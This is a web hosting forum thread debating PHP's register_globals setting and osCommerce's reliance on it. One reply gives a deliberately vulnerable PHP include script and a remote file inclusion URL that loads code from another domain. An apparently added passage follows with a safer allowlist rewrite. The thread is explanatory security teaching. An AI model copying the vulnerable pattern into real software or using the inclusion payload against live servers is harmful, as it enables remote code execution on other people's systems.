
Thread: register_globals on or off ??

  1. #1
    Member
    Join Date
    May 2002
    Posts
    139

    Default register_globals on or off ??

    I have up until now had register_globals = on, but am now changing it to off.

    Here's my question:

    Every post I see tells me that having register_globals = on is a major security issue; however, osCommerce requires it to be on. Does this mean that osCommerce is insecure, or is having register_globals = on not such a security issue?

    I'm confused.

  2. #2
    Technical Product Specialist cPanelDavidG's Avatar
    Join Date
    Nov 2006
    Location
    Houston, TX
    Posts
    11,307
    cPanel/WHM Access Level

    Root Administrator

    Default

    Requiring register_globals is commonly accepted as being very poor programming practice among PHP coders. Enabling register_globals is a security risk from the perspective of the system administrators. In fact, some PHP apps now will refuse to function in an environment where register_globals is on due to the security risk.

    Generally the advice is that if a PHP application requires register_globals, you may want to consider another PHP application.

    Also, many PHP coders are beginning to prepare for PHP 6, where register_globals will no longer be available. If something is still requiring register_globals, it's a bit behind the times as far as PHP coding standards go.

  3. #3
    Member
    Join Date
    May 2002
    Posts
    139

    Default

    I would have thought osCommerce (being one of the most popular shopping carts) would have been pretty safe to use, but maybe it's not the best?

  4. #4
    Member
    Join Date
    Aug 2002
    Posts
    1,129

    Default

    I recently wrote up an article concerning this.

    In regards to osCommerce, I just think their developers have fallen asleep. Is the project even being actively developed any more?

    I would really be afraid to use osCommerce, because if they are willing to ignore the issue such as register_globals, what other issues are they ignoring? Do you really feel safe knowing that your e-commerce website is handled by such a piece of software? What if a major, major vulnerability is found in osCommerce, are they going to sit on their hands for 10 years before releasing a fix?

    This isn't to say that having register_globals disabled will instantly bring you a ton of extra security. It's also not to say that writing a script that requires register_globals to be enabled is a security flaw. But the common conception regarding register_globals is that it should be turned off. Script developers should be aware of this and should have already adjusted their scripts to function in this manner.

  5. #5
    Member twhiting9275's Avatar
    Join Date
    Sep 2002
    Posts
    368
    cPanel/WHM Access Level

    Root Administrator

    Default

    Here's my 0.02:
    globals themselves are not bad, as long as you secure them. The problem is that wannabe coders get in there and write crappy scripts cheaply, and decide 'hey, we're just not going to secure our globals at all'. This (of course) leads to hacking, problems, and just all around bad things.

    Now, should they be required on or off? Well, as of php6, you won't have a choice. Thank the gods that's not for a while, but still, it'll happen, eventually. Personally, I'm still getting ready for that day (I do use a few globals, properly secured, of course), but it'll be a bloody nightmare when everything gets there.

    Personally, I say leave 'em on, for now. When PHP makes you turn 'em off, do so, but not until. Otherwise, this will cause some HUGE problems with pretty common software.
    Linux Tech Networks: Reliable Server Administration and Monitoring since 2002

  6. #6
    Technical Product Specialist cPanelDavidG's Avatar
    Join Date
    Nov 2006
    Location
    Houston, TX
    Posts
    11,307
    cPanel/WHM Access Level

    Root Administrator

    Default

    Quote Originally Posted by twhiting9275
    Here's my 0.02:
    globals themselves are not bad, as long as you secure them. The problem is that wannabe coders get in there and write crappy scripts cheaply, and decide 'hey, we're just not going to secure our globals at all'. This (of course) leads to hacking, problems, and just all around bad things.

    Now, should they be required on or off? Well, as of php6, you won't have a choice. Thank the gods that's not for a while, but still, it'll happen, eventually. Personally, I'm still getting ready for that day (I do use a few globals, properly secured, of course), but it'll be a bloody nightmare when everything gets there.

    Personally, I say leave 'em on, for now. When PHP makes you turn 'em off, do so, but not until. Otherwise, this will cause some HUGE problems with pretty common software.

    Note that globals (global variables) is a completely different thing from register_globals. Anyone who is spending enough time to secure their PHP scripts will likely spend a few seconds to avoid the need for register_globals.

    If you're not familiar with global variables from a programming standpoint, here's a link to the Wikipedia article on it:

    http://en.wikipedia.org/wiki/Global_variable

    In PHP, register_globals allows any parameter passed to the script to be assigned to a global variable (including overwriting the values of existing global variables, hence the danger of this setting). Let's say you have this PHP script named exploit_me.php:

    PHP Code:
    // Warning: never code like this in a register_globals environment.
    // With register_globals on, a request parameter named include_file has
    // already been turned into $include_file before this line runs, so a
    // default that is only applied when the variable is unset keeps the
    // attacker-supplied value.
    if (!isset($include_file)) {
        $include_file = "myinclude.inc";
    }

    // Note the lack of anything polling GET or POST variables explicitly.
    include($include_file);
    Now let's say you call this URL:

    Code:
    http://yourDomain.com/exploit_me.php?include_file=http://myDomain.com/xss.php
    My XSS script would then run on your server since you have register_globals enabled and I'm overwriting the include_file global variable with my own data.

    While this is an obvious example, don't expect this to be as obvious in many scripts. How do people know what variables you are using? Well, most scripts people use are open source, so you can just look at the source.

    I hope this clears some misconceptions of register_globals vs. PHP global variables.
    Last edited by cPanelDavidG; 12-03-2007 at 09:28 AM. Reason: So you can see the full URL being called.
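As an added illustration (this is not cPanelDavidG's code from the post above, nor anything from osCommerce), here is the same page-selection logic written so that it is safe whether register_globals is on or off: the script refuses to run when the directive is enabled, reads its input explicitly from $_GET, and maps that input through an allowlist of known include files, so a request value never becomes part of a path. The file names, the page keys and the two function names are placeholders chosen for the example; it is written in PHP 5 syntax because register_globals only exists in PHP versions before 5.4.

```php
<?php
// Added example (not code from the thread or from osCommerce): a page
// selector written to be safe whether register_globals is on or off.
// File names, page keys and function names are placeholders.

// Refuse to run when register_globals is on. ini_get() returns the raw
// php.ini value as a string ("1", "On", "" ...), so normalise it first.
// On PHP 5.4+ the directive no longer exists and ini_get() returns false,
// which the (string) cast turns into "" and therefore "disabled".
function register_globals_enabled()
{
    $value = strtolower(trim((string) ini_get('register_globals')));
    return in_array($value, array('1', 'on', 'yes', 'true'), true);
}

// Map a request value onto an allowlist of known include files. The request
// value is only ever used as an array key and never becomes part of a path,
// so neither "../something" nor "http://attacker.example/x.php" can reach
// include(). Arrays (?page[]=x) and unknown keys fall back to the default.
function resolve_page($requested)
{
    $allowed = array(
        'home'    => 'myinclude.inc',
        'about'   => 'about.inc',
        'contact' => 'contact.inc',
    );
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return $allowed['home'];
    }
    return $allowed[$requested];
}

if (register_globals_enabled()) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('This application requires register_globals = Off.');
}

// Input is read explicitly from the superglobal, and the variable that feeds
// include() is always assigned here, never left to whatever was injected.
$requested    = isset($_GET['page']) ? $_GET['page'] : 'home';
$include_file = dirname(__FILE__) . '/' . resolve_page($requested);

include $include_file;
```

The two habits that matter most here are the explicit read from $_GET and the allowlist lookup: the first removes the dependence on register_globals altogether, and the second means that even a script which still accidentally trusts an injected variable cannot be steered to an arbitrary local or remote file.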

  7. #7
    Member
    Join Date
    Sep 2006
    Posts
    5

    Default

    Hello,

    Instead of setting the variable register_globals = on you need to apply the patch at the URL http://www.oscommerce.com/community/contributions,2097.

    Once it is applied, register_globals MUST be disabled, otherwise it will not work.
    Regards,
    Bibin
    Jr. Systems Engineer
    http://SupportPRO.com :: Transparent Web Hosting Support Services to Web Hosting Businesses ..

  8. #8
    Member
    Join Date
    Jul 2008
    Posts
    65

    Default

    A while back, I had the misfortune of having to set up oscommerce for customers, including trying to integrate add-ons. The code nearly made me scream in horror.

    I have heard good stuff about Zen Cart, which I believe is similar. I haven't looked at it in depth, though. You should probably take a look at it. And if you're a Drupal fan, there's the e-Commerce modules, as well as the Ubercart system.
